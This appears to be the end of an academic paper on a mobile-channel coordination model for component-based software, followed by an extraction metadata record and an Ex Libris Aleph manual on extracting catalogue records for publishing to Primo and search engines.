The interface of a component provides coordination methods for the active internal objects (i.e., threads) in an instance of that component for operations on channels. These methods are listed in figure 8. The threads cannot perform any operation directly on the channel-ends, because the channel-ends do not provide any methods for them, not even a constructor. Therefore, the only way to perform an operation on a channel is to use the coordination methods in the component interface. The coordination operations are divided in three groups: the topological operations, the input/output operations, and the inquiry operations.
These operations are basic operations and more complex operations can be created by composition of these basic ones. It is, also, the responsibility of the component to ensure proper synchronization for its internal threads, if they refer to the same channel-ends. Our basic coordination primitives can be wrapped in component defined methods to enforce such internal protocols.
For every method containing a timeout parameter, there is also a version without the time-out (not listed in the figure). When no time-out is given the thread performing the method suspends indefinitely until the operation succeeds or the method throws an exception. For uniformity of explanation, we assume that the time-out parameter can also have the special value of infinity. This way we need not define two versions of each operation.
Topological Operations
*CreateChannel* creates a new channel of the specified type. The value of this parameter can be synchronous or asynchronous channels like FIFO, bag, set, etc. The channel-ends, source and sink, are created at the same location as the component and their references are returned as an array of type `Object`: `Object[0] = Source` and `Object[1] = Sink`. We return this array, instead of some `Channel` data-structure containing the channel-end references, in order to avoid introducing new unnecessary data types. If desired, this method can be wrapped to return such a `Channel` class but this is not necessary.
*Connect* connects the specified channel-end `ce` to the component instance that contains the thread that performs this operation. If the channel-end is currently connected to another component instance, then the active entity suspends and waits in a queue until the channel-end is connected to this component instance or, its time-out expires. The method returns `true` to indicate success, or `false` to indicate that it timed-out. When a connect operation is successful and other threads in the same component instance are waiting to connect to the same channel-end, they all succeed. If a thread tries to connect to a channel-end already connected to the component instance, it also immediately succeeds.
When the *Connect* operation succeeds, the channel-end physically moves to the location of the component instance in the network. All channel-ends connected to the component move along with it while they remain connected.
*Disconnect* disconnects the specified channel-end `ce` from the component instance that contains the thread performing this operation. This method *always succeeds* on a valid channel-end. It returns `true` if the channel-end was actually connected to the component instance and `false` otherwise. If `ce` is invalid, e.g. `null`, then the method throws an exception.
Input/Output Operations
*Write* suspends the thread that performs this operation until either the `Object var` is written into the channel-end `ce`, or its specified time-out expires. Only `Serializable` objects, channel-end identities, and component locations can be written into a channel. The `Serializable` objects are copied before inserted into the channel, therefore no references to the internal objects of a component can be sent through channels. The method returns the value `true` if the operation succeeds, and the value `false` if its time-out expires. The method throws an exception if either `ce` is invalid, the component instance is not connected to the channel-end, the `Object var` is not `Serializable`, or it contains a reference to a non-`Serializable` object.
*Read* suspends the thread that performs this operation until a value is read from the sink channel-end `ce`, or its specified time-out expires. In the first case, the method returns a `Serializable Object`, a channel-end identity, or a `Location`. In the second case the method returns the value `null`. The value is not removed from the channel. The method throws an exception if either `ce` is not valid, or the component instance is not connected to the channel-end.
*Take* is the destructive variant of the *Read* operation. It behaves the same as a *Read* except that the read value is also removed from the channel.
Inquiry Operations
*Wait* is the inquiry operation. It suspends the thread that performs it until either the conditions specified in *conds* become true or its time-out expires. In the first case the method returns *true*, and otherwise it returns *false*. The channel-ends involved in *conds* need not be connected to the component instance in order to perform this operation, but an invalid channel-end reference throws an exception. The argument *conds* is a boolean combination of primitive channel conditions such as *connected(ce)*, *disconnected(ce)*, *empty(ce)*, *full(ce)*, etc.
5.6. A Small Example
We use a simple implementation of the mobile agent component of the example in section 3, to show the utility of the coordination operations provided by our model. Figure 9 shows the Java pseudo-code for this agent. *AgentInterface* is the agent’s interface and consists of the basic interface plus a method *Move*. This method moves the agent to the specified location, together with the channel-ends it is connected to, *(readChannelEnd, writeChannelEnd, and channel[1]*). The *readChannelEnd* and *writeChannelEnd* channel-ends are, respectively, the sink and the source of the channels for interaction with the component U. The agent has a list containing the locations of the information sources it is expected to visit, together with their respective source channel-end references where it can issue its requests.
```java
void agentImplementation()
{
AgentInterface.Connect(readChannelEnd);
AgentInterface.Connect(writeChannelEnd);
Object[] channel = CreateChannel(FIFOchannel);
AgentInterface.Connect(channel[1]);
For each entry in informationSourceList do
AgentInterface.Move(List[InformationSource].location, channel[1]);
AgentInterface.Connect(List[InformationSource].sourceEnd);
AgentInterface.Write(List[InformationSource].sourceEnd, REQUEST + channel[0]);
AgentInterface.Disconnect(List[InformationSource].sourceEnd);
information.add(AgentInterface.Read(channel[1]));
information.transformation();
AgentInterface.Write(writeChannelEnd, information);
String cond = "notEmpty( " + readChannelEnd + " )";
information.clear();
if ( AgentInterface.Wait(cond, 0) ) then
read an instruction from this channelEnd and process it.
fi
od
AgentInterface.Disconnect(readChannelEnd);
AgentInterface.Disconnect(writeChannelEnd);
}
```
Figure 9. Simple Implementation of The Mobile Agent
6. Related Work and Conclusion
In this paper we presented a coordination model for component-based software based on mobile channels. The idea of using (mobile) channels for components has its foundations in the earlier work of some of the authors of this paper, e.g., in [5], [6].
Our model provides a clear separation of concerns between the coordination and the computational aspects of a system. We force a component to have an interface for its interaction with the outside world, but we do not make any assumptions about its internal implementation. We define the interface of a component as a dynamic set of channel-ends. Channels provide an anonymous means of communication, where the communicating components need not know each other, or the structure of the system. The architectural expressiveness of channels allows our model to easily describe a system in terms of the interfaces of its components and its channel connections, abstracting away their computational aspects. Coordination is expressed merely as operations performed on such channels. The mobility of channels allows dynamic reconfiguration of channel connections within a system.
The PICCOLA project [1] is related to our work. PICCOLA is a language for composing applications from software components. It has a small syntax and a minimal set of features needed for specifying different styles of software composition, e.g. pipes and filters, streams, events, etc. At the bottom level of PICCOLA there is an abstract machine that considers components as agents. These agents are based on the $\pi$-calculus, but they communicate with each other by sending forms through shared channels instead of tuples. Forms are a special notion of extensible, immutable records. In comparison with PICCOLA, our coordination model can be seen as a possible mobile channel style for component composition. Therefore, the interfaces of our components are defined in such a way that they already fit within this style. Because our model only focuses on the mobile channel style, it is much simpler to use when this style is desired. However, our model is not just a style but also, like PICCOLA, a composition language.
Certain aspects of and concerns in ROOM [27] and Darwin [21], two architectural description languages (ADL), are related to our work. In ROOM components are described by declaring their internal structures, their external interfaces, and the behavior of their sub-components (if they are composite components). The interface of a component is a set of ports. A port is the place where components offer or require certain services. The communication through these ports is bidirectional and in the form of asynchronous messaging. The components of Darwin are similar to the ones of ROOM, but instead of ports, Darwin components have portals. These portals specify the input and output of a component in terms of services, as in ROOM. However, the binding of portals is not specified, leaving them open for all kinds of possible bindings. Another difference between Darwin and ROOM, is that Darwin can describe dynamically changing systems, while ROOM can describe only static ones. This makes Darwin more suitable than ROOM for component-based systems that use our coordination model. Of course, to model mobile channels or the dynamic set of interfaces of a component, for instance, some extensions to Darwin would be necessary.
Other models for component-based software can benefit from the coordination model presented in this paper, because ours is a basic model that focuses only on the coordination of components. Our model can extend other models that are concerned with other aspects of components, for example, their internal implementation, their evolution, etc.
Because our model provides exogenous coordination (see section 2.3), it opens the possibility to apply more powerful coordination paradigms that are based on the notion of mobile channels to component-
based software. One such paradigm, is Reo[3, 4]. Reo supports composition of channels into complex connectors whose semantics are independent of the components they connect to. We are currently extending our coordination model for component based systems in order to support all the features of Reo.
Finally, although it is not the main purpose of this paper, the Java implementation presented in section 5 shows not only that components can be implemented using object-oriented languages, but also how this can be done. This demonstrates that a clear integration of components is possible in object oriented paradigms such as UML.
References
|
{"Source-Url": "http://www.liacs.nl/~jguillen/publications/Final_Jan05_jguillen_Funda.pdf", "len_cl100k_base": 12909, "olmocr-version": "0.1.50", "pdf-total-pages": 22, "total-fallback-pages": 0, "total-input-tokens": 64463, "total-output-tokens": 15869, "length": "2e13", "weborganizer": {"__label__adult": 0.00029587745666503906, "__label__art_design": 0.00027561187744140625, "__label__crime_law": 0.00022399425506591797, "__label__education_jobs": 0.0005125999450683594, "__label__entertainment": 4.89354133605957e-05, "__label__fashion_beauty": 0.00011771917343139648, "__label__finance_business": 0.0001499652862548828, "__label__food_dining": 0.0002772808074951172, "__label__games": 0.00038552284240722656, "__label__hardware": 0.0005655288696289062, "__label__health": 0.0003235340118408203, "__label__history": 0.0001919269561767578, "__label__home_hobbies": 6.467103958129883e-05, "__label__industrial": 0.0002505779266357422, "__label__literature": 0.00022125244140625, "__label__politics": 0.00021183490753173828, "__label__religion": 0.000392913818359375, "__label__science_tech": 0.005832672119140625, "__label__social_life": 7.277727127075195e-05, "__label__software": 0.003767013549804687, "__label__software_dev": 0.98486328125, "__label__sports_fitness": 0.0002598762512207031, "__label__transportation": 0.00041747093200683594, "__label__travel": 0.00018978118896484375}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 63885, 0.01064]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 63885, 0.67696]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 63885, 0.87987]], "google_gemma-3-12b-it_contains_pii": [[0, 1764, false], [1764, 5485, null], [5485, 8410, null], [8410, 11786, null], [11786, 15661, null], [15661, 18533, null], [18533, 21031, null], [21031, 23893, null], [23893, 27489, null], [27489, 30462, null], [30462, 33101, null], [33101, 36196, null], [36196, 39511, null], [39511, 40686, null], [40686, 43168, null], [43168, 45615, null], [45615, 48271, null], [48271, 51621, null], [51621, 54153, null], [54153, 58113, null], [58113, 61267, null], [61267, 63885, null]], "google_gemma-3-12b-it_is_public_document": [[0, 1764, true], [1764, 5485, null], [5485, 8410, null], [8410, 11786, null], [11786, 15661, null], [15661, 18533, null], [18533, 21031, null], [21031, 23893, null], [23893, 27489, null], [27489, 30462, null], [30462, 33101, null], [33101, 36196, null], [36196, 39511, null], [39511, 40686, null], [40686, 43168, null], [43168, 45615, null], [45615, 48271, null], [48271, 51621, null], [51621, 54153, null], [54153, 58113, null], [58113, 61267, null], [61267, 63885, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 63885, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 63885, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 63885, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 63885, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 63885, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 63885, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 63885, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 63885, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 63885, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 63885, null]], "pdf_page_numbers": [[0, 1764, 1], [1764, 5485, 2], [5485, 8410, 3], [8410, 11786, 4], [11786, 15661, 5], [15661, 18533, 6], [18533, 21031, 7], [21031, 23893, 8], [23893, 27489, 9], [27489, 30462, 10], [30462, 33101, 11], [33101, 36196, 12], [36196, 39511, 13], [39511, 40686, 14], [40686, 43168, 15], [43168, 45615, 16], [45615, 48271, 17], [48271, 51621, 18], [51621, 54153, 19], [54153, 58113, 20], [58113, 61267, 21], [61267, 63885, 22]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 63885, 0.0]]}
|
olmocr_science_pdfs
|
2024-12-01
|
2024-12-01
|
48b846f5ac40b795c7679c0c7e2330448b22a37a
|
Aleph Publishing Mechanism
Version 16 and later
CONFIDENTIAL INFORMATION
The information herein is the property of Ex Libris Ltd. or its affiliates and any misuse or abuse will result in economic loss. DO NOT COPY UNLESS YOU HAVE BEEN GIVEN SPECIFIC WRITTEN AUTHORIZATION FROM EX LIBRIS LTD.
This document is provided for limited and restricted purposes in accordance with a binding contract with Ex Libris Ltd. or an affiliate. The information herein includes trade secrets and is confidential.
DISCLAIMER
The information in this document will be subject to periodic change and updating. Please confirm that you have the most current documentation. There are no warranties of any kind, express or implied, provided in this documentation, other than those expressly agreed upon in the applicable Ex Libris contract. This information is provided AS IS. Unless otherwise agreed, Ex Libris shall not be liable for any damages for use of this document, including, without limitation, consequential, punitive, indirect or direct damages.
Any references in this document to third-party material (including third-party Web sites) are provided for convenience only and do not in any manner serve as an endorsement of that third-party material or those Web sites. The third-party materials are not part of the materials for this Ex Libris product and Ex Libris has no liability for such materials.
TRADEMARKS
"Ex Libris," the Ex Libris bridge, Primo, Aleph, Alephino, Voyager, SFX, MetaLib, Verde, DigiTool, Preservation, URM, Voyager, ENCompass, Endeavor eZConnect, WebVoyage, Citation Server, LinkFinder and LinkFinder Plus, and other marks are trademarks or registered trademarks of Ex Libris Ltd. or its affiliates.
The absence of a name or logo in this list does not constitute a waiver of any and all intellectual property rights that Ex Libris Ltd. or its affiliates have established in any of its products, features, or service names or logos.
Trademarks of various third-party products, which may include the following, are referenced in this documentation. Ex Libris does not claim any rights in these trademarks. Use of these marks does not imply endorsement by Ex Libris of these third-party products, or endorsement by these third parties of Ex Libris products.
Oracle is a registered trademark of Oracle Corporation.
UNIX is a registered trademark in the United States and other countries, licensed exclusively through X/Open Company Ltd.
Microsoft, the Microsoft logo, MS, MS-DOS, Microsoft PowerPoint, Visual Basic, Visual C++, Win32, Microsoft Windows, the Windows logo, Microsoft Notepad, Microsoft Windows Explorer, Microsoft Internet Explorer, and Windows NT are registered trademarks and ActiveX is a trademark of the Microsoft Corporation in the United States and/or other countries.
Unicode and the Unicode logo are registered trademarks of Unicode, Inc.
Google is a registered trademark of Google, Inc.
Copyright Ex Libris Limited, 2017. All rights reserved.
Document released: December 2016
Web address: http://www.exlibrisgroup.com
# Table of Contents
GENERAL: PURPOSE AND SCOPE .............................................................. 5
1 CREATING AND UPDATING POPULATION SETS VIA EXTRACT PROCESS ........................................ 5
1.1 Initial Extract Process ................................................................. 5
1.2 Ongoing Extract Process ............................................................ 7
1.2.1 UE_21 and UE_22 ............................................................... 8
1.3 Retrieval of Repository Records .................................................. 9
1.4 Adding Published Sets ............................................................... 10
1.5 The tab_publish table: Specifications for the Extraction of ALEPH Records 10
2 EXPAND PROGRAMS RELATED TO PUBLISHING ......................... 12
2.1 expand_doc_bib_avail ............................................................... 12
2.2 expand_doc_bib_avail_hol ......................................................... 13
2.3 expand_doc_del_fields ............................................................ 15
2.4 expand_doc_bib_accref_1 ......................................................... 15
3 NOTES ON IMPLEMENTING THE PUBLISHING MECHANISM FOR PRIMO ........................................ 15
3.1 General ....................................................................................... 15
3.2 Setup for MAB Records Extract .................................................. 18
3.2.1 $data_tab/tab_publish .......................................................... 18
3.2.2 $data_tab/tab-expand .......................................................... 18
3.2.3 $data_tab/tab_fix and corresponding tab_fix_convit_ref_pm .......... 19
4 TECHNICAL INFORMATION FOR THE ALEPH PUBLISHING MECHANISM ........................................ 21
4.1 Information Required for the Maintenance of the Z00P Oracle Table ...... 21
4.1.1 Disk Space, Definitions, and Basic Concepts ............................ 21
4.1.2 Oracle Recommendations ................................................... 21
4.2 Initial Publishing Process (publish-04) Parallelism Recommendations ..... 22
4.3 Implementation Notes ............................................................... 22
4.3.1 Z00P/Z07P Creation ............................................................. 22
4.3.2 Configuration Table ............................................................. 23
4.3.3 JAVA Environment Configuration ........................................ 23
4.3.4 Daemon Handling ................................................................. 24
4.3.5 Availability Updates ............................................................. 25
4.3.6 Additional Notes ................................................................. 25
General: Purpose and Scope
The objective of the functionality that is described in this document is to implement a simple mechanism that allows sites to extract records from the ALEPH catalog for publishing purposes (for example, for publishing to search engines and search tools such as Google and Primo).
This publishing platform includes a record extraction of population sets for different ends from a bibliographic or authority library into a repository. The repository is constantly updated. Retrieval of records from the repository can be done to an external system such as Primo.
This document describes the flow and setup needed for successful publishing.
1 Creating and Updating Population Sets via Extract Process
The extract process has two different flows: initial and ongoing. The initial extract usually includes all records in the catalog, while the ongoing extract mainly deals with new and updated records.
Both publishing processes place the documents into the data repository which is stored in the Z00P Oracle table of the USR library.
Note that the extract process can be performed on the whole database or on specific logical bases. The extract process creates different population sets which are stored in separate Z00P records.
In addition, extracted records can be modified to include information added by standard ALEPH procedures such as FIX and EXPAND.
1.1 Initial Extract Process
The initial extract process is performed by running Initial Publishing Process (publish-04). This service can be run from the Publishing submenu of the Services menu in the Cataloging module.
The selected range of records for the specified population set is extracted (ALL is for all sets specified by the System Librarian).
The extraction (initial and ongoing) is performed according to the `tab_publish` table located under the `tab` directory of the library that contains the records to be extracted (for example, USM01). For more details on how to configure the publishing process, see Section 1.4 Adding Published Sets.
If **Initial Publishing Process (publish-04)** tries to upload an invalid xml (containing bibliographic information), a file is written under the `$alephe_scratch` directory. Its name is `publish_04`. The file contains the document number and the library of the document which was not updated due to the invalid xml.
**Note:** **Initial Publishing Process (publish-04)** works only if the Z00P of the selected population set and its selected record range under the library in which `publish_04` is activated are empty.
In order to delete ALEPH published records that were extracted from the ALEPH catalog for publishing purposes, **Delete ALEPH Published Records (publish-05)** can be used. It has the following parameters: Publishing set, range of records, and number of processes to be created. The selected range of records for a specified set is deleted from Z00P regardless of the original library from which they were extracted.
Note that in order to delete all the sets at once, util/a/17/1 on z00p table should be used.
If a change is made to a base or to a base definition in tab_base.lng and this base exists in tab_publish, Delete ALEPH Published Records (publish-05) and Initial Publishing Process (publish-04) should be run to create the initial load again. UE_21 should be restarted.
1.2 Ongoing Extract Process
The ongoing extract process is required in order to reflect changes to the database such as the deletion of records and updates to the bibliographic records/holdings records/item records, etc. The ongoing extract process has two main stages:
- The trigger for the extract
- The creation/update of repository records
The triggering mechanism for the extract is based on the ALEPH indexing trigger mechanism. In ALEPH, a Z07 record is created for each new or modified record. In the ongoing extract process, when a Z07 record is created for a bibliographic record, the system creates a Z07P record. The Z07P is the trigger for the ongoing extract process.
Note that the creation of z07p is depended on whether tab_publish exists in the Bibliographic and/or Authority library. If the table does not exist, no z07p records are created.
Z07 records are created for bibliographic records in various cases such as changes to the related holdings records, authority records, items, etc. This ensures that bibliographic records are indexed not only according to their own data but also according to associated data. Since the Z07P is based on the Z07, it guarantees that
the extracted records, which might contain information derived from FIX and EXPAND procedures, are correctly updated.
Z07p records are also created when an item is loaned, returned, or its hold request status is changed to S (On Hold Shelf).
Z07p is also created for repository records (Z00P) that no longer belong to a set (for example their corresponding bibliographic record has been deleted or its base was changed). The z00p record receives a DELETED status.
The timing of the creation of the trigger record (Z07P) differs depending on whether or not the population set is created based on a logical base. If the population set is not base-dependent, the Z07P is created immediately after the creation of the Z07 record (before it is processed by the UE_01 indexing daemon). If the population set is base-sensitive, the record must be indexed before it is extracted. In this case, the Z07P record is created only after the Z07 record has been processed by the UE_01 daemon. The reason for this difference is that in sites where the population sets are not base-sensitive there is no reason to wait for the indexing of the records in order to start the ongoing extract process.
Note that the timing of the creation of the Z07P records explained above is not dependent on the specific population set but depends on whether there is at least one entry in the tab_publish table (see Section 1.4 Adding Published Sets) that is base dependent. If, for example, there are four population sets defined in the table but only one is base sensitive, then for all sets the Z07P record is created after the processing of the UE_01 daemon.
1.2.1 UE_21 and UE_22
The handling of the changed Z00P records is performed by the Ongoing Publishing utility, UE_21. This utility compares the Z00P record, for which the Z07P was created, with the Z00P record in the repository. If the records differ (after EXPAND and FIX), the Z00P record is handled/changed. When the service finishes processing the triggered documents, the Z07P records are deleted.
The Ongoing Publishing utility, UE_21, should be run on a regular basis in order to ensure that the repository is up to date. The Stop Update Publishing Data utility, UE_22, stops UE_21.
If UE_21 tries to upload an invalid xml (containing bibliographic information), a file is written under the library’s data_scratch directory with the following name convention: util_e_21.xml.err.<YYYYMMDD>.<HHMMSSmm>. The file contains the document number and the library of the document which was not updated due to the invalid xml. The library should look every couple of days for these files and handle them.
The performance of ue_21 by can be improved by setting the aleph_start/prof_library variable: num_ue_21_processes. This variable enables you to divide the running of the job into several processes. The variable can be set in aleph_start or in the prof_library file of the publishing library. Setting the variable in
Salephe_root/aleph_start or aleph_start.private affects all of the publishing libraries. Setting the variable in $data_root/prof_library of the publishing library affects only this library.
### 1.3 Retrieval of Repository Records
The changes triggered by Z07P update the Z00P records. **Create Tar File for ALEPH Published Records (publish-06)** can take the updated Z00P records based on dates, record numbers, and an input file and create a tar file for them. This file can be later transferred to different publishing platforms.
If an error occurs while trying to extract a document into the tar file, then that document number is written in an error file. The error file is placed under the library’s data_scratch directory.
The name of the file includes the name of the publishing set to which the document belongs and the date and time of the failed extraction. For instance: p_publish_06.err.<Publishing set name>.YYYYMMDDHHMMSSmm. The file includes the document numbers of the failed documents in the format of <Doc Number><Library>, for example 000052114USM01.
1.4 Adding Published Sets
The recommended process of adding new published sets is as follows:
1. Setup the tab_publish table (see Section 1.5) with the required definitions of the new set.
2. Run Initial Publishing Process (publish-04). Use the new set name as the parameter, and run the service on all of the documents in the range.
3. Run Create Tar File for ALEPH Published Records (publish-06). Use the new set name as the parameter and run the service on all of the documents in the range.
4. Make sure Create Tar File for ALEPH Published Records (publish-06) is set in the job_list for execution on your desired frequency includes the new set and is run with the from last handled date parameter.
1.5 The tab_publish table: Specifications for the Extraction of ALEPH Records
Both the initial and the ongoing extract process perform the creation and update of records based on the specifications defined in the tab_publish table. Note that the retrieval of repository records does not use this table.
The tab_publish table must be located under the tab directory of the library that contains the records to be extracted (in most cases this is the bibliographic and/or the authority libraries).
Following is a sample from the tab_publish table:
<table>
<thead>
<tr>
<th>!</th>
<th>1</th>
<th>2</th>
<th>3</th>
<th>4</th>
<th>5</th>
</tr>
</thead>
<tbody>
<tr>
<td>!!!!!!!!-!!!!!!!!!!!!!!!-!!!!!!!!!!!!!!!-!!!!!!!!!!!-!!!!!!!!!!!!!!!-</td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>TOTAL</td>
<td>N ALL</td>
<td>MARC_XML</td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>MEDICINE</td>
<td>MED</td>
<td>N MED</td>
<td>MARC_XML</td>
<td></td>
<td></td>
</tr>
<tr>
<td>LAW</td>
<td>LAW</td>
<td>N LAW</td>
<td>MARC_XML</td>
<td></td>
<td></td>
</tr>
</tbody>
</table>
Key to the Table:
**Column 1 – Publishing Set**
This column contains the code of the publishing set of records to be extracted. For example, if the database needs to be extracted in two separate formats for two separate publishing platforms (such as Google and Primo) then two separate sets should be defined in the table. Note that the code must be in upper case.
**Column 2 – Base**
A set can be the entire database or a section of the database as defined by a logical base. This column contains the code of the desired logical base from the tab_base.lng table. If the column is left blank, the entire database is extracted for the set.
**Column 3 - De-duplication (for future use)**
This column is currently not in use.
**Column 4 - Fix and Expand Code**
This column contains the fix and expand code of the routines that should be applied before the record is extracted.
**Column 5 - Repository Format**
This column determines the format of the records in the repository. Currently the supported formats are:
- MARC_XML
- MAB_XML
- OAI_DC_XML (available for ALEPH version 18 and up)
- OAI_MARC21_XML (available for ALEPH version 18 and up)
- HTML (available for ALEPH version 18 and up)
Following is a sample of a record in MAB-XML format:
```xml
<record xmlns="http://www.db.de/professionell/mabxml/mabxml-1.2.1a"
<identifier>mab-publish:000000006</identifier>
</header>
<metadata>
<controlfield tag="001" nds="2">
<subfield code="6">Bancroft, Hubert H.</subfield>
</controlfield>
<datafield tag="100" ind1="1" ind2="2">
<subfield code="a">Bancroft, Hubert H.</subfield>
<subfield code="8">Bibliography</subfield>
</datafield>
<datafield tag="300" ind1="1" ind2="2">
<subfield code="a">The history of California, vol. 4. 1846 - 1847</subfield>
</datafield>
<datafield tag="410" ind1="1" ind2="2">
<subfield code="a">San Francisco</subfield>
</datafield>
</metadata>
</record>
</ListRecords>
</OAIRecordSet>
```
Note that when a document is removed from a base or deleted, the following status attribute is added to the header tag of the extracted document for the specific base:
```xml
<identifier>aleph-publish:000000006</identifier>
</header>
```
Note that when a document is removed from a base, the following status attribute is added to the header tag of the extracted document for the specific base:
2 Expand Programs Related to Publishing
There are 3 new expand programs which serve the publishing process.
2.1 expand_doc_bib_avail
The expand program, `expand_doc_bib_avail`, brings items and holdings availability information. For each HOL record, an AVA line is created with the holding information and its availability. The information is presented in the AVA field which has the following sub fields:
- **$a**: ADM library code
- **$b**: Sub library code
- **$c**: Collection – If there are several items in different collections in one sub library, only one collection of the sub library is presented.
- **$d**: Call Number – If there are several items in different collections in one sub library, only one call number in the collection is presented.
- **$e**: Availability status – Can be available, unavailable, or check_holding. Available status is assigned only when there is a certainty that there is an on-shelf item. Unavailable is assigned only when there is a certainty that there is no on-shelf item. check_holdings is assigned for all other cases (for example, the number of Items is larger than the THRESHOLD, there are holdings but no Items attached, etc.)
- **$f**: Number of Items (for the entire sub library not just location).
- **$g**: Number of unavailable items (for the entire sub library not just location).
- **$h**: Multi-volume flag (Y/N) – If first item’s Z30-ENUMERATION-A is not blank or 0 then =Y otherwise = N.
- **$i**: Number of History loans (for the entire sub library not just location).
- **$j**: Collection code – If there are several items in different collections in one sub library, only one collection of the sub library is presented.
An item is unavailable if it matches one of the following conditions:
- It is on loan (it has a Z36).
- It is on hold shelf (it has Z37_status=S).
- Items with process statuses are considered unavailable.
Column 3 of tab_expand can be used to specify:
- A threshold for checking availability. If the number of items in the sublibrary exceeds the threshold defined in this parameter, then no availability check is performed and the availability is reported as check_holding. This value is set by setting column 3 of the tab_expand line with:
THRESHOLD=xxx.
For example:
```
AVAIL expand_doc_bib_avail THRESHOLD=050
```
The default threshold is 010.
- The items of item process statuses should be treated as available. This value is set by setting column 3 of the tab_expand line with:
```
AVA=xx,yy
```
Where xx and yy are the process statuses that are regarded as available. For example:
```
AVAIL expand_doc_bib_avail AVA=BD,NW
```
- Retrieve availability information by collection (in addition to sublibrary). This value is set by setting column 3 of the tab_expand line with:
```
COLLECTION=Y
```
If several parameters are to be defined, a semicolon must separate them, and the threshold must be defined first. For example:
```
AVAIL expand_doc_bib_avail THRESHOLD=050;AVA=BD,NW
```
**Note:**
Information from suppressed HOL records (STA field is SUPPRESSED) is not expanded.
Items that are defined in tab15 as not OPAC displayable (column 10) is not included in the expand.
### 2.2 expand_doc_bib_avail_hol
The expand program, expand_doc_bib_avail_hol, brings holdings and item availability information, based on the Holding records 852 field and subfields.
The information is presented in the AVA field which has the following sub fields:
- **$$a** ADM library code
- **$$b** Sub library code, based on the 852$$b of the HOL record
- **$$c** Collection text, based on the 852$$c of the HOL record
- **$$d** Call Number - The HOL record’s 852 subfields which are set in aleph_start variable: correct_852_subfields (can be 1 or more of the following subfields: hijklm)
- **$$e** Availability status - Can be “available”, “unavailable”, “check_holdings”, or “temporary_location”. Available status is assigned if the total number of items minus unavailable items is positive. Unavailable is assigned if the total number of items minus unavailable items is zero or negative. If a record has no linked items (only Holdings records) the status is “check_holdings”. If all the items linked to the Holding
records are in a temporary location the status is “temporary_location”. This subfield can be affected by the value of the THRESHOLD parameter in column 3 of tab_expand.
$$f$$ The number of Items that are linked to the HOL record. If no items are linked to the HOL record, it is set to 0.
$$g$$ The number of unavailable items (for the entire sub library not just location) that are linked to the HOL record. If no items are linked to the HOL record, it is set to 0.
$$h$$ Multi-volume flag (Y/N) – If the first item’s Z30-ENUMERATION-A is not blank or 0 then =Y otherwise = N.
$$i$$ The number of loans (for the entire sub library not just location). Based on the HOL record’s linked items. If no item is linked, it is set to 0.
$$j$$ Collection code (852$$c$$ of the HOL record).
$$k$$ Call Number type 1st indicator of 852. If the first indicator of field 852 in the holdings record is 7, the value of 852 subfield $$2$$ is copied to AVA$$k$$.
$$p$$ Location priority. A number that represent the priority of the item by its location. The expand_doc_bib_avail_hol routine consults ./bib_lib/tab/ava_location_priority and AVA$$p$$ is created with a number that represents the location priority.
If there is no match with the ava_location_priority table, no subfield p is created.
If there are 2 HOL records, for example, with the same sublibrary + collection values, then two AVA$$p$$ subfilelds are created with the same priority rank.
$$t$$ Availability text translation. Contains a translation of the content of subfield 'e' (available status), according to the text of the messages entered in table ./error_lng/expand_doc_bib_avail (the same one as used by expand_doc_bib_avail).
$$7$$ Holdings ID - Contains the HOL library code and the HOL record number (e.g. USM60000000741) for which the AVA is created. Non-relevant for AVA fields of items with no linked HOL record.
**Routine Additional Parameters**
To define additional subfields added to the AVA fields from the 852 field of the HOL, set the parameter $SF$ in column 3 of tab_expand (for example: $SF=z,t$) to copy subfields $$$z$ and $$$t$. Note that the additional subfields that are copied from the HOL record 852 to the AVA field override the subfields created this expand program.
To define the maximum number of items to check per sublibrary, set the following parameter in column 3 of tab_expand: $\text{THRESHOLD}=080$. In this example, the maximum number of items per sublibrary is 80. Note that the number set in this parameter must have three digits. This parameter affects the content of subfield $$$e$ (availability status) and sub field $$$t$ (translation of $$$e$).
Items with process statuses are considered “unavailable”. Note that Col.3 of tab_expand can be used to specify item process statuses that their items should be treated as “available”.
To ignore item process statuses that should be treated as “available”, set the following parameter in column 3 of tab_expand: $\text{AVA}=BD,MK$. It is possible to specify more than one process statuses, delimited by a comma “,”.
If you want to take reshelving time into account; set the following parameter in column 3 of tab_expand: RESHELVING=Y. This is mostly relevant for Real Time Availability functionality (availability X service).
For example:
<table>
<thead>
<tr>
<th>!</th>
<th>1</th>
<th>2</th>
<th>3</th>
</tr>
</thead>
<tbody>
<tr>
<td></td>
<td>!!!!!!!!!!!!!!!!!!-!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!></td>
<td></td>
<td></td>
</tr>
<tr>
<td>FULLP</td>
<td>expand_doc_bib_avail_hol</td>
<td>THRESHOLD=050;AVA=BD,NW;SF=z,t.</td>
<td></td>
</tr>
</tbody>
</table>
In this example:
The THRESHOLD parameter limits the number of items per sublibrary to 50.
The AVA parameter defines items with process status BD or NW as available.
The SF parameter adds 852$$z$ and 852$$t$ to the AVA$$z$ and AVA$$t$. The SF parameter supports multiple subfield occurrences.
**Note:**
For items that are not related to any HOL records, an AVA field is created for each sublibrary and collection combination similar to expand_doc_bib_avail, as if COLLECTION=Y is defined and without consulting the SF parameter.
### 2.3 expand_doc_del_fields
